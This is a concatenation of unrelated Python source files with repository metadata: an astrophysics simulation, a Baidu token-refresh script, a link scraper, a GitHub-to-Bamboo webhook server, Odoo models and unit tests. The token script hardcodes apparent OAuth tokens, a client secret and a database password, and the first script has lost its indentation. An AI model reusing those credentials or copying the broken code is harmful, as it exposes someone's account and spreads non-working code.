b = Brane(I,dx,wavelength=0.87e-3,nphi=(2**12,2**14),anisotropy=1,pa=None,r_inner=50,live_dangerously=True)
# estimate the time resolution of our simulation assuming some screen velocity.
screen_velocity = 200. #km/s
fs = screen_velocity/(b.screen_dx*b.ips) # Hz
num_samples = b.nphi[1]/b.ips - b.nx # try num_samples = 100 for testing porpoises.
logger.info('Number of samples: {0:g}'.format(num_samples))
logger.info('Sampling interval: {0:g}s'.format(1./fs))
logger.info('Time coverage: {0:g} days'.format(num_samples/fs/(3600.*24.)))
# generate the screen (this takes a while)
logger.info('generating screen...')
tic = time.time()
b.generatePhases()
logger.info('took {0:g}s'.format(time.time()-tic))
# generate time series (this takes a while)
logger.info('generating time series...')
fluxes = []
frames = []
tic = time.time()
for i in range(num_samples):
# update source image to include a sinusoidal flux modulation
b.setModel(I*(1. - 0.4*np.sin(2*np.pi*i/(2*num_samples))), dx) # comment out to speedup
b.scatter(move_pix=i*b.ips)
fluxes.append(b.iss.sum())
frames.append(b.iss)
logger.info('took {0:g}s'.format(time.time()-tic))
# 1962.92s
# make figures
fig_file = '../_static/time_variability/'
extent=b.dx*b.nx//2*np.array([1,-1,-1,1])
plt.figure()
plt.subplot(121)
isrc_smooth = utilities.smoothImage(b.isrc,b.dx,2.*b.dx)
plt.imshow(isrc_smooth,extent=extent,cmap=cmap)
plt.xlabel('$\Delta\\alpha$ [$\mu$as]'); plt.ylabel('$\Delta\delta$ [$\mu$as]')
plt.subplot(122)
iss_smooth = utilities.smoothImage(b.iss,b.dx,2.*b.dx)
plt.imshow(iss_smooth,extent=extent,cmap=cmap)
plt.gca().set_yticklabels(10*['']); plt.gca().set_xticklabels(10*[''])
if write_figs: plt.savefig(fig_file+'/iss.png',bbox_inches='tight')
plt.figure()
t = 1./fs*np.arange(len(fluxes))/3600.
plt.plot(t,fluxes,color='#377EB8')
plt.xlabel('time [hr]')
plt.ylabel('flux [Jy]')
plt.xlim([0,t.max()])
plt.grid()
if write_figs: plt.savefig(fig_file+'/flux.png',bbox_inches='tight')
# and a movie
import matplotlib.animation as animation
i = 0
def updatefig(*args):
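    # Advance to the next stored frame and display its smoothed image (used by FuncAnimation below).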
global i
i = (i + 1) % num_samples
im.set_array(utilities.smoothImage(frames[i],b.dx,2*b.dx))
return im
plt.show()
fig = plt.figure(figsize=(8,6))
im = plt.imshow(utilities.smoothImage(frames[0],b.dx,2*b.dx), cmap=cmap, animated=True,
extent=extent, interpolation=None)
plt.xlabel('$\Delta\\alpha$ [$\mu$as]')
plt.ylabel('$\Delta\delta$ [$\mu$as]')
ani = animation.FuncAnimation(fig, updatefig, interval=50, blit=False, frames=int(1000))
Writer = animation.writers['ffmpeg']
writer = Writer(fps=15, metadata=dict(artist='Katherine Rosenfeld'), bitrate=1800)
if write_figs:
logger.info('writing movie!')
ani.save('mov.mp4',writer=writer)
plt.close()
else:
plt.show()
| mit | -1,363,312,966,128,243,000 | 32.763158 | 107 | 0.704858 | false |
matrixorz/justpic | justpic/etc/pcstool.py | 1 | 1581 | {"expires_in":2592000,"refresh_token":"22.ca7aeff542c491ee0c9de8a3010a9de4.315360000.1724417263.3875775130-1056026","access_token":"21.8bdf77c07a392aea779d571a24903d45.2592000.1411649263.3875775130-1056026","session_secret":"8ddef6d7ab2a0b36034c53a46bcbb6c0","session_key":"9mnRfHBbgiKJcCaPaY1v1Qjo2\/VryC6ZM+X+sorRrQ6C8hWQeryRbEXcZmR2RyHGaDPD8yD8\/LGm+jHuvnVhx6fV0IO5EEJGmQ==","scope":"basic netdisk"}
# "refresh_token":"22.ca7aeff542c491ee0c9de8a3010a9de4.315360000.1724417263.3875775130-1056026"
# "access_token":"21.8bdf77c07a392aea779d571a24903d45.2592000.1411649263.3875775130-1056026"
client_id='oA8jMPTjA8yrtaGsc2i5HHdx'
client_secret='kas6A0XFr7uArRnXL4Da0GCvyxRqRiWw'
# Get the long-lived (forever) token?
import MySQLdb
db = MySQLdb.connect("localhost","david","david","picturetoken")
cursor=db.cursor()
cursor.execute("select * from picturetoken")
rs=cursor.fetchone()
# cursor.close
print rs
print rs[2]
refresh_token=rs[2]
from baidupcs.tools import get_new_access_token
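# Exchange the stored refresh token for a fresh access/refresh token pair via the Baidu PCS API.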
response=get_new_access_token(refresh_token,client_id,client_secret)
access_token=response.json()['access_token']
refresh_token=response.json()['refresh_token']
print access_token
print refresh_token
print type(access_token)
# cursor=db.cursor()
# print
# add_salary = """insert into picturetoken(access_token, refresh_token) values(%s,%s)""" ,(access_token,refresh_token)
# print add_salary
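# Replace the stored token row with the newly issued access/refresh token pair.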
cursor.execute("delete from picturetoken")
cursor.execute( """insert into picturetoken(access_token, refresh_token) values(%s,%s)""" ,(str(access_token),str(refresh_token)))
cursor.close()
db.commit()
db.close()
| mit | 5,203,383,678,631,350,000 | 41.72973 | 402 | 0.794434 | false |
surajsinghbisht054/Information_Gathering_Python_Web_Scraping_Scripts | html_link_extractor/link_re.py | 1 | 1087 | #!/usr/bin/python
##################################################
######## Please Don't Remove Author Name #########
############### Thanks ###########################
##################################################
#
#
__author__='''
Suraj Singh
[email protected]
https://bitforestinfo.blogspot.in/
'''
# Import Module
import urllib.request, urllib.error, urllib.parse
import sys
import re
if len(sys.argv)==1:
	print("[*] Please provide a domain name:\n Usage: python link_re.py http://www.examplesite.com\n")
sys.exit(0)
# Retrieve Html Data From Url
def get_html(url):
try:
		page = urllib.request.urlopen(url).read().decode('utf-8', errors='ignore')
except Exception as e:
print("[Error Found] ",e)
page=None
return page
html_data=get_html(sys.argv[1])
# Condition
if html_data:
pattern = re.compile('(<a .*?>)') # First, Find all <a > tag
a_tag_captured = pattern.findall(html_data)
for i in a_tag_captured: # Second, Now Find href tag in all tag
href=re.search('href=.*', i[1:-1])
if href: # If Tag Found
print(href.group().split(' ')[0]) # Print Tag
| apache-2.0 | -3,389,522,426,765,960,000 | 24.880952 | 91 | 0.563017 | false |
amwelch-oss/bamboo-pr-feedback | bin/pr_feedback_server.py | 1 | 5276 | #! /usr/bin/env python
import tornado.web
import tornado.httpserver
import tornado.ioloop
import getpass
import requests
import json
import os
import hashlib
import hmac
import argparse
#Since bamboo does not have api tokens you will need to provide a real user's password
# If you don't want to store the password in plaintext in the config file you will
# be prompted for it when the server starts up
bamboo_password = None
def get_config(config_file):
'''
Loads and parses the json config file and returns
a config object
'''
try:
data = json.load(open(config_file))
return data
except ValueError:
print "Config file {} has invalid json.".format(config_file)
    except (IOError, OSError):
print "Config file {} does not exist".format(config_file)
return {}
def is_commit(msg):
'''
Check to make sure the github hook is firing on a commit.
'''
accepted = ['synchronize', 'opened', 'reopened']
commit = msg.get('action') in accepted
if not commit:
print "Not a commit hook. Action: {}, Accepted {}".format(msg.get('action'),
accepted)
return commit
def get_sha1_hmac(shared_secret, raw):
'''
Takes the shared secret and a raw string and generates
and returns a sha1 hmac
'''
hashed = hmac.new(str(shared_secret), str(raw), hashlib.sha1).hexdigest()
return "sha1={}".format(hashed)
class GithubHandler(tornado.web.RequestHandler):
'''
Handle posts from github hook
'''
def verify_secret(self, request, config):
'''
Verify the shared secret, returns True on verified False otherwise
'''
ss = config.get("github_shared_secret")
if not ss:
print "No shared secret configured (github_shared_secret)"
return
gh_digest = request.headers.get("X-Hub-Signature")
if not gh_digest:
            print "Did not receive digest from github. Do you have it configured in the hook?"
return
local_digest = get_sha1_hmac(ss, request.body)
if local_digest != gh_digest:
print "Digest from github did not match our digest"
print "GH : {}".format(gh_digest)
print "LOCAL: {}".format(local_digest)
return
else:
return True
def post(self):
config_file = os.environ.get('BAMBOO_PR_FEEDBACK_CONFIG', "../config/config.json")
config = get_config(config_file)
if not self.verify_secret(self.request, config):
return
data = self.request.body
try:
data = json.loads(data)
except ValueError:
print "Recieved invalid json"
print data
return
if not is_commit(data):
return
plan = config.get("plan")
host = config.get("bamboo_host")
port = config.get("bamboo_port", 443)
user = config.get("bamboo_user")
password = config.get("bamboo_password", bamboo_password)
# Required fields, unsafe get
bamboo_data = {}
bamboo_data["pull_num"] = data["number"]
bamboo_data["pull_sha"] = data["pull_request"]["head"]["sha"]
bamboo_data["pull_ref"] = data["pull_request"]["head"]["ref"]
run_bamboo_job(plan, host, port, user, password, bamboo_data)
self.finish()
def run_bamboo_job(plan, host, port, user,
password, bamboo_data):
'''
Post to bamboo server to kick off a job.
'''
params = ""
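    # Each variable is passed as a bamboo.variable.<name> query parameter so the build plan can read it.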
for k, v in bamboo_data.iteritems():
params += "&bamboo.variable.{}={}".format(k, v)
    bamboo_queue_build = "https://{}:{}/builds/rest/api/latest/queue/{}?os_authType=basic{}"
url = bamboo_queue_build.format(host, port, plan, params)
headers = {}
headers['Accept'] = 'application/json'
res = requests.post(url, auth=(user, password), headers=headers)
if res.status_code != 200:
print "Error starting job"
print res.json()
else:
print "Running commit: {}".format(bamboo_data['pull_sha'])
def parse_args():
p = argparse.ArgumentParser(description=\
'''
Processes github hooks and activates bamboo builds via rest api
''')
p.add_argument('--ssl-cert', help='location of ssl cert', required=True)
p.add_argument('--ssl-key', help='location of ssl cert', required=True)
return p.parse_args()
def main():
args = parse_args()
ssl_settings = {
"certfile": args.ssl_cert,
"keyfile": args.ssl_key
}
config_file = os.environ.get('BAMBOO_PR_FEEDBACK_CONFIG', "../config/config.json")
config = get_config(config_file)
application = tornado.web.Application([
(r"/gh", GithubHandler)
])
server = tornado.httpserver.HTTPServer(application, ssl_options=ssl_settings)
server.listen(config.get("server_port", 80))
if not config.get('bamboo_password'):
global bamboo_password
bamboo_password = getpass.getpass('Please enter your bamboo password: \n').strip()
print "Listening on port: {}".format(config.get("server_port", 80))
tornado.ioloop.IOLoop.instance().start()
if __name__ == '__main__':
main()
| mit | -2,551,280,784,974,783,000 | 29.321839 | 94 | 0.608036 | false |
open-synergy/opnsynid-l10n-indonesia | l10n_id_taxform_retur_pajak_masukan/models/retur_pajak_masukan.py | 1 | 2380 | # -*- coding: utf-8 -*-
# Copyright 2017 OpenSynergy Indonesia
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
from openerp import models, fields, api
class ReturPajakMasukan(models.Model):
_name = "l10n_id.retur_pajak_masukan"
_description = "Retur Pajak Masukan"
_inherit = ["l10n_id.faktur_pajak_common"]
@api.model
def _get_faktur_pajak_type(self):
return self.env.ref(
"l10n_id_taxform_retur_pajak_masukan.fp_type_rp_masukan")
name = fields.Char(
string="# Retur Pajak Masukan",
)
enofa_nomor_dokumen = fields.Char(
string="NOMOR_DOKUMEN_RETUR",
)
enofa_tanggal_dokumen = fields.Char(
string="TANGGAL_RETUR",
)
enofa_masa_pajak = fields.Char(
string="MASA_PAJAK_RETUR",
)
enofa_tahun_pajak = fields.Char(
string="TAHUN_PAJAK_RETUR",
)
enofa_jumlah_dpp = fields.Char(
string="NILAI_RETUR_DPP",
)
enofa_jumlah_ppn = fields.Char(
string="NILAI_RETUR_PPN",
)
enofa_jumlah_ppnbm = fields.Char(
string="NILAI_RETUR_PPNBM",
)
enofa_nomor_dokumen_balik = fields.Char(
string="NOMOR_FAKTUR",
)
enofa_tanggal_dokumen_balik = fields.Char(
string="TANGGAL_FAKTUR",
)
reference_id = fields.Many2one(
string="Doc. Reference",
comodel_name="account.move",
)
reference_ids = fields.Many2many(
string="Doc. References",
comodel_name="account.move",
relation="rel_rp_masukan_2_move",
column1="rp_masukan_id",
column2="move_id",
)
all_reference_ids = fields.Many2many(
string="Doc. References",
comodel_name="account.move",
relation="rel_rp_masukan_2_all_move",
compute="_compute_all_reference",
column1="rp_masukan_id",
column2="move_id",
store=True,
)
reverse_id = fields.Many2one(
string="Reverse From",
comodel_name="l10n_id.faktur_pajak_masukan",
)
substitute_id = fields.Many2one(
string="Substitute For",
comodel_name="l10n_id.retur_pajak_masukan",
)
@api.onchange("reference_id")
def onchange_reference_id(self):
if self.reference_id:
self.name = self.reference_id.name
| agpl-3.0 | 1,572,841,041,619,940,400 | 27.382716 | 69 | 0.584454 | false |
numericalalgorithmsgroup/pybobyqa | pybobyqa/tests/test_hessian.py | 1 | 7948 | """
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
The development of this software was sponsored by NAG Ltd. (http://www.nag.co.uk)
and the EPSRC Centre For Doctoral Training in Industrially Focused Mathematical
Modelling (EP/L015803/1) at the University of Oxford. Please contact NAG for
alternative licensing.
"""
# Ensure compatibility with Python 2
from __future__ import absolute_import, division, print_function, unicode_literals
import numpy as np
import unittest
from pybobyqa.hessian import Hessian
def array_compare(x, y, thresh=1e-14):
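    # True when the largest element-wise difference is below the threshold.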
return np.max(np.abs(x - y)) < thresh
class TestBasicInit(unittest.TestCase):
def runTest(self):
n = 4
nvals = n*(n+1)//2
hess = Hessian(n)
self.assertEqual(hess.shape(), (nvals,), 'Wrong shape for initialisation')
self.assertEqual(hess.dim(), n, 'Wrong dimension')
self.assertEqual(len(hess), nvals, 'Wrong length')
self.assertTrue(np.all(hess.upper_triangular() == np.zeros((nvals,))), 'Wrong initialised values')
class TestInitFromVector(unittest.TestCase):
def runTest(self):
n = 5
nvals = n*(n+1)//2
x = np.arange(nvals, dtype=float)
hess = Hessian(n, vals=x)
self.assertEqual(hess.shape(), (nvals,), 'Wrong shape for initialisation')
self.assertEqual(hess.dim(), n, 'Wrong dimension')
self.assertEqual(len(hess), nvals, 'Wrong length')
self.assertTrue(np.all(hess.upper_triangular() == x), 'Wrong initialised values')
class TestInitFromMatrix(unittest.TestCase):
def runTest(self):
n = 3
nvals = n*(n+1)//2
A = np.arange(n**2, dtype=float).reshape((n,n))
hess = Hessian(n, vals=A+A.T) # force symmetric
self.assertEqual(hess.shape(), (nvals,), 'Wrong shape for initialisation')
self.assertEqual(hess.dim(), n, 'Wrong dimension')
self.assertEqual(len(hess), nvals, 'Wrong length')
self.assertTrue(np.all(hess.upper_triangular() == np.array([0.0, 4.0, 8.0, 8.0, 12.0, 16.0])),
'Wrong initialised values')
class TestToFull(unittest.TestCase):
def runTest(self):
n = 7
A = np.arange(n ** 2, dtype=float).reshape((n, n))
H = A + A.T # force symmetric
hess = Hessian(n, vals=H)
self.assertTrue(np.all(hess.as_full() == H), 'Wrong values')
class TestGetElementGood(unittest.TestCase):
def runTest(self):
n = 3
A = np.arange(n ** 2, dtype=float).reshape((n, n))
H = A + A.T # force symmetric
hess = Hessian(n, vals=H)
for i in range(n):
for j in range(n):
self.assertEqual(hess.get_element(i, j), H[i,j], 'Wrong value for (i,j)=(%g,%g): got %g, expecting %g'
% (i, j, hess.get_element(i, j), H[i,j]))
class TestGetElementBad(unittest.TestCase):
def runTest(self):
n = 4
A = np.arange(n ** 2, dtype=float).reshape((n, n))
H = A + A.T # force symmetric
hess = Hessian(n, vals=H)
# When testing for assertion errors, need lambda to stop assertion from actually happening
self.assertRaises(AssertionError, lambda: hess.get_element(-1, 0))
self.assertRaises(AssertionError, lambda: hess.get_element(-1, 0))
self.assertRaises(AssertionError, lambda: hess.get_element(-3, n-1))
self.assertRaises(AssertionError, lambda: hess.get_element(n, 0))
self.assertRaises(AssertionError, lambda: hess.get_element(n+3, 0))
self.assertRaises(AssertionError, lambda: hess.get_element(n+7, n-1))
self.assertRaises(AssertionError, lambda: hess.get_element(0, -1))
self.assertRaises(AssertionError, lambda: hess.get_element(0, -1))
self.assertRaises(AssertionError, lambda: hess.get_element(n-1, -3))
self.assertRaises(AssertionError, lambda: hess.get_element(0, n))
self.assertRaises(AssertionError, lambda: hess.get_element(0, n+3))
self.assertRaises(AssertionError, lambda: hess.get_element(n-1, n+7))
class TestSetElementGood(unittest.TestCase):
def runTest(self):
n = 3
A = np.arange(n ** 2, dtype=float).reshape((n, n))
H = A + A.T # force symmetric
hess = Hessian(n, vals=H)
H2 = np.sin(H)
for i in range(n):
for j in range(n):
hess.set_element(i, j, H2[i,j])
for i in range(n):
for j in range(n):
self.assertEqual(hess.get_element(i, j), H2[i, j], 'Wrong value for (i,j)=(%g,%g): got %g, expecting %g'
% (i, j, hess.get_element(i, j), H2[i, j]))
class TestSetElementBad(unittest.TestCase):
def runTest(self):
n = 5
A = np.arange(n ** 2, dtype=float).reshape((n, n))
H = A + A.T # force symmetric
hess = Hessian(n, vals=H)
# When testing for assertion errors, need lambda to stop assertion from actually happening
self.assertRaises(AssertionError, lambda: hess.set_element(-1, 0, 1.0))
self.assertRaises(AssertionError, lambda: hess.set_element(-1, 0, 2.0))
self.assertRaises(AssertionError, lambda: hess.set_element(-3, n - 1, 3.0))
self.assertRaises(AssertionError, lambda: hess.set_element(n, 0, 4.0))
self.assertRaises(AssertionError, lambda: hess.set_element(n + 3, 0, -4.0))
self.assertRaises(AssertionError, lambda: hess.set_element(n + 7, n - 1, 5.0))
self.assertRaises(AssertionError, lambda: hess.set_element(0, -1, 6.0))
self.assertRaises(AssertionError, lambda: hess.set_element(0, -1, 7.0))
self.assertRaises(AssertionError, lambda: hess.set_element(n - 1, -3, -7.0))
self.assertRaises(AssertionError, lambda: hess.set_element(0, n, -76.3))
self.assertRaises(AssertionError, lambda: hess.set_element(0, n + 3, 2.8))
self.assertRaises(AssertionError, lambda: hess.set_element(n - 1, n + 7, -1.0))
class TestMultGood(unittest.TestCase):
def runTest(self):
n = 5
A = np.arange(n ** 2, dtype=float).reshape((n, n))
H = np.sin(A + A.T) # force symmetric
hess = Hessian(n, vals=H)
vec = np.exp(np.arange(n, dtype=float))
hs = np.dot(H, vec)
self.assertTrue(array_compare(hess*vec, hs, thresh=1e-12), 'Wrong values')
class TestMultBad(unittest.TestCase):
def runTest(self):
n = 5
A = np.arange(n ** 2, dtype=float).reshape((n, n))
H = A + A.T # force symmetric
hess = Hessian(n, vals=H)
# When testing for assertion errors, need lambda to stop assertion from actually happening
self.assertRaises(AssertionError, lambda: hess * 1.0)
self.assertRaises(AssertionError, lambda: hess * None)
self.assertRaises(AssertionError, lambda: hess * [float(i) for i in range(n)])
self.assertRaises(AssertionError, lambda: hess * np.arange(n-1, dtype=float))
self.assertRaises(AssertionError, lambda: hess * np.arange(n+1, dtype=float))
class TestNeg(unittest.TestCase):
def runTest(self):
n = 5
A = np.arange(n ** 2, dtype=float).reshape((n, n))
H = A + A.T # force symmetric
hess = Hessian(n, vals=H)
neghess = -hess
self.assertTrue(np.allclose(hess.upper_triangular(), -neghess.upper_triangular()), 'Wrong negative values')
| gpl-3.0 | -7,834,234,041,995,986,000 | 42.431694 | 120 | 0.632738 | false |
artopping/nyu-python | course1/assignment_6/rf_random_walk.py | 1 | 2312 | #!/usr/bin/env python3
import random
import sys
import math
def get_random_direction():
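    # Pick one of the four compass directions with equal probability (0.25 each).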
direction = ""
probability = random.random()
if probability < 0.25:
direction = "west"
elif 0.25<=probability<0.5:
direction= "north"
elif 0.5<= probability<0.75:
direction= "south"
else:
direction = "east"
return direction
def get_direction_displacement(direction):
    displacements = {
        'west': (-1, 0),
        'east': (1, 0),
        'north': (0, 1),
        'south': (0, -1)
    }
    return displacements[direction]
def take_walk(steps):
    current_location = [0, 0]
    for step_index in range(steps):
        direction = get_random_direction()
        displacement = get_direction_displacement(direction)
        # extract the numerical values from the tuple
        delta_x = displacement[0]
        delta_y = displacement[1]
        # update current_location with the step taken in this direction
        current_location[0] += delta_x
        current_location[1] += delta_y
    return current_location
def take_all_walks(steps, runs):
endpoints = []
for run_index in range(runs):
end_location = take_walk(steps)
endpoints.append(end_location)
return endpoints
def average_final_distance(endpoints):
total_distance = 0
for coords in endpoints:
dx = coords[0]
dy = coords[1]
#use the Pythagorean theorem to get distance like last session
distance = math.sqrt(dx**2 + dy**2)
total_distance += distance
return total_distance / len(endpoints)
if __name__ == "__main__":
steps = 10
if len(sys.argv) > 1:
steps = int(sys.argv[1])
runs = 1
if len(sys.argv) > 2:
runs = int(sys.argv[2])
end_locations = take_all_walks(steps, runs)
    print("Done with walks, printing end locations:")
    print(end_locations)
average_displacement = average_final_distance(end_locations)
print(average_displacement)
| mit | -265,223,460,572,834,500 | 26.855422 | 78 | 0.609429 | false |
OpenTreeOfLife/germinator | ws-tests/opentreetesting.py | 1 | 10580 | #!/usr/bin/env python
# This file was copied from the phylesystem-api repo and is intended
# to replace it.
from ConfigParser import SafeConfigParser
from cStringIO import StringIO
import requests
import gzip
import json
import sys
import os
_CONFIG = None
_CONFIG_FN = None
if 'VERBOSE_TESTING' in os.environ:
try:
_VERBOSITY_LEVEL = int(os.environ['VERBOSE_TESTING'])
except:
_VERBOSITY_LEVEL = 1
else:
_VERBOSITY_LEVEL = 0
def debug(s):
if _VERBOSITY_LEVEL > 0:
sys.stderr.write('testing-harness: {s}\n'.format(s=s))
def config(section=None, param=None, default=None):
'''
Returns the config object if `section` and `param` are None, or the
value for the requested parameter.
If the parameter (or the section) is missing, the exception is logged and
None is returned.
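    Example (assuming test.conf defines apihost in its [host] section):
        apihost = config('host', 'apihost')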
'''
global _CONFIG, _CONFIG_FN
if _CONFIG is None:
_CONFIG_FN = os.path.abspath('test.conf')
_CONFIG = SafeConfigParser()
_CONFIG.read(_CONFIG_FN)
parse_argv_as_options(_CONFIG)
if section is None and param is None:
return _CONFIG
try:
v = _CONFIG.get(section, param)
return v
except:
if default != None:
return default
else:
sys.stderr.write('Config file "%s" does not contain option "%s" in section "%s"\n' % (_CONFIG_FN, param, section))
return None
# Obtain command line option assignments given in the form section:parameter=value
def parse_argv_as_options(_CONFIG):
for arg in sys.argv[1:]:
equatands = arg.split('=')
if len(equatands) == 2:
sec_param = equatands[0].split(':')
if len(sec_param) == 2:
if not _CONFIG.has_section(sec_param[0]):
_CONFIG.add_section(sec_param[0])
_CONFIG.set(sec_param[0], sec_param[1], equatands[1])
else:
sys.stderr.write('Command line argument %s not in form section:parameter=value' % (arg))
else:
sys.stderr.write('Command line argument %s not in form section:parameter=value' % (arg))
def summarize_json_response(resp):
sys.stderr.write('Sent request to %s\n' %(resp.url))
raise_for_status(resp)
try:
results = resp.json()
except:
print 'Non json resp is:', resp.text
return False
if isinstance(results, unicode) or isinstance(results, str):
print results
er = json.loads(results)
print er
print json.dumps(er, sort_keys=True, indent=4)
sys.stderr.write('Getting JavaScript string. Object expected.\n')
return False
print json.dumps(results, sort_keys=True, indent=4)
return True
def summarize_gzipped_json_response(resp):
sys.stderr.write('Sent request to %s\n' %(resp.url))
raise_for_status(resp)
try:
uncompressed = gzip.GzipFile(mode='rb', fileobj=StringIO(resp.content)).read()
results = uncompressed
except:
raise
if isinstance(results, unicode) or isinstance(results, str):
er = json.loads(results)
print json.dumps(er, sort_keys=True, indent=4)
return True
else:
print 'Non gzipped response, but not a string is:', results
return False
def get_obj_from_http(url,
verb='GET',
data=None,
params=None,
headers=None):
'''Call `url` with the http method of `verb`.
If specified `data` is passed using json.dumps
returns the json content of the web service or raise an HTTP error
'''
if headers is None:
headers = {
'content-type' : 'application/json',
'accept' : 'application/json',
}
if data:
resp = requests.request(verb,
translate(url),
headers=headers,
data=json.dumps(data),
params=params,
allow_redirects=True)
else:
resp = requests.request(verb,
translate(url),
headers=headers,
params=params,
allow_redirects=True)
debug('Sent {v} to {s}'.format(v=verb, s=resp.url))
debug('Got status code {c}'.format(c=resp.status_code))
if resp.status_code != 200:
debug('Full response: {r}'.format(r=resp.text))
raise_for_status(resp)
return resp.json()
# Returns two results if return_bool_data.
# Otherwise returns one result.
def test_http_json_method(url,
verb='GET',
data=None,
headers=None,
expected_status=200,
expected_response=None,
return_bool_data=False,
is_json=True):
'''Call `url` with the http method of `verb`.
If specified `data` is passed using json.dumps
returns True if the response:
has the expected status code, AND
has the expected content (if expected_response is not None)
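    When return_bool_data is True, a (success, parsed response) tuple is
    returned instead of a bare boolean.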
'''
fail_return = (False, None) if return_bool_data else False
if headers is None:
headers = {
'content-type' : 'application/json',
'accept' : 'application/json',
}
if data:
resp = requests.request(verb,
translate(url),
headers=headers,
data=json.dumps(data),
allow_redirects=True)
else:
resp = requests.request(verb,
translate(url),
headers=headers,
allow_redirects=True)
if resp.status_code != expected_status:
debug('Sent {v} to {s}'.format(v=verb, s=resp.url))
debug('Got status code {c} (expecting {e})'.format(c=resp.status_code,e=expected_status))
debug('Did not get expected response status. Got:\n{s}'.format(s=resp.status_code))
debug('Full response: {r}'.format(r=resp.text))
raise_for_status(resp)
# this is required for the case when we expect a 4xx/5xx but a successful return code is returned
return fail_return
if expected_response is not None:
if not is_json:
return (True, resp.text) if return_bool_data else True
try:
results = resp.json()
if results != expected_response:
debug('Did not get expect response content. Got:\n{s}'.format(s=resp.text))
return fail_return
except:
debug('Non json resp is:' + resp.text)
return fail_return
if _VERBOSITY_LEVEL > 1:
debug(unicode(results))
elif _VERBOSITY_LEVEL > 1:
debug('Full response: {r}'.format(r=resp.text))
if not is_json:
return (True, resp.text) if return_bool_data else True
return (True, resp.json()) if return_bool_data else True
def raise_for_status(resp):
try:
resp.raise_for_status()
except Exception, e:
try:
j = resp.json()
            m = '\n '.join(['"{k}": {v}'.format(k=k, v=v) for k, v in j.items()])
sys.stderr.write('resp.json = {t}'.format(t=m))
except:
if resp.text:
sys.stderr.write('resp.text = {t}\n'.format(t=resp.text))
raise e
def api_is_readonly():
s = config('host', 'allowwrite', 'false').lower()
return not (s == 'true')
def exit_if_api_is_readonly(fn):
if not api_is_readonly():
return
if _VERBOSITY_LEVEL > 0:
debug('Running in read-only mode. Skipped {}'.format(fn))
# This coordinates with run_tests.sh
sys.exit(3)
def github_oauth_for_write_or_exit(fn):
"""Pass in the name of test file and get back the OAUTH token from
the GITHUB_OAUTH_TOKEN environment if the test is not readonly.
Otherwise, exit with the exit code (3) that signals tests skipping.
"""
exit_if_api_is_readonly(fn)
auth_token = os.environ.get('GITHUB_OAUTH_TOKEN')
if auth_token is None:
debug('{} skipped due to lack of GITHUB_OAUTH_TOKEN in env\n'.format(fn))
# This coordinates with run_tests.sh
sys.exit(3)
return auth_token
def writable_api_host_and_oauth_or_exit(fn):
"""Convenience/safety function to makes sure you aren't running
writable phylesystem tests against the production api server.
Returns the domain and GITHUB_OAUTH_TOKEN token if the test configuration
is not readonly, the server is not "https://api.opentree.*" and GITHUB_OAUTH_TOKEN
is in your env. Otherwise exits with the "skip" test code.
"""
apihost = config('host', 'apihost').strip()
if apihost.startswith('https://api.opentree'):
debug('{} skipped because host is set to production api server. This test must be run locally or against devapi.\n'.format(fn))
# This coordinates with run_tests.sh
sys.exit(3)
auth_token = github_oauth_for_write_or_exit(fn)
return apihost, auth_token
# Mimic the behavior of apache so that services can be tested without
# having apache running. See deploy/setup/opentree-shared.conf
translations = [('/v2/study/', '/phylesystem/v1/study/'),
('/cached/', '/phylesystem/default/cached/'),
# treemachine
('/v2/graph/', '/db/data/ext/graph/graphdb/'),
('/v2/tree_of_life/', '/db/data/ext/tree_of_life/graphdb/'),
('/v3/tree_of_life/', '/db/data/ext/tree_of_life_v3/graphdb/'),
# taxomachine
('/taxomachine/v1/', '/db/data/ext/TNRS/graphdb/'),
('/v2/tnrs/', '/db/data/ext/tnrs_v2/graphdb/'),
('/v2/taxonomy/', '/db/data/ext/taxonomy/graphdb/'),
('/v3/tnrs/', '/db/data/ext/tnrs_v3/graphdb/'),
('/v3/taxonomy/', '/db/data/ext/taxonomy_v3/graphdb/'),
# oti
('/v3/studies/', '/db/data/ext/studies/graphdb/'),
('/v2/studies/', '/db/data/ext/studies/graphdb/'),
# smasher (port 8081)
('/v2/conflict/', '/')
]
def translate(s):
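    # Rewrite public API paths to the raw backend paths listed above when
    # host:translate is set to true in test.conf (mimics the apache rewrites).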
if config('host', 'translate', 'false') == 'true':
for (src, dst) in translations:
if src in s:
return s.replace(src, dst)
return s
| bsd-2-clause | 149,666,204,171,669,300 | 36.51773 | 135 | 0.566163 | false |
Micronaet/micronaet-migration | report_product_pricelist/wizard/create_pricelist.py | 1 | 18271 | # -*- coding: utf-8 -*-
###############################################################################
#
# ODOO (ex OpenERP)
# Open Source Management Solution
# Copyright (C) 2001-2015 Micronaet S.r.l. (<http://www.micronaet.it>)
# Developer: Nicola Riolini @thebrush (<https://it.linkedin.com/in/thebrush>)
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
import os
import sys
import logging
import openerp
import openerp.netsvc as netsvc
import openerp.addons.decimal_precision as dp
from openerp.osv import fields, osv, expression, orm
from datetime import datetime, timedelta
from dateutil.relativedelta import relativedelta
from openerp import SUPERUSER_ID, api
from openerp import tools
from openerp.tools.translate import _
from openerp.tools.float_utils import float_round as round
from openerp.tools import (DEFAULT_SERVER_DATE_FORMAT,
DEFAULT_SERVER_DATETIME_FORMAT,
DATETIME_FORMATS_MAP,
float_compare)
_logger = logging.getLogger(__name__)
class MicronaetInvoiceLine(orm.Model):
''' Invoice line
'''
_name = 'micronaet.invoice.line'
_description = 'Invoice line'
_order = 'date'
_columns = {
'name': fields.char('Invoice number', size=10, required=True),
        'partner': fields.char('Partner code', size=9),
        'price': fields.char('Price', size=15),
        'quantity': fields.char('Quantity', size=10),
        'product': fields.char('Product code', size=10),
        'date': fields.char('Date', size=10),
}
# Product pricelist from model to generated:
class product_pricelist_generator(orm.TransientModel):
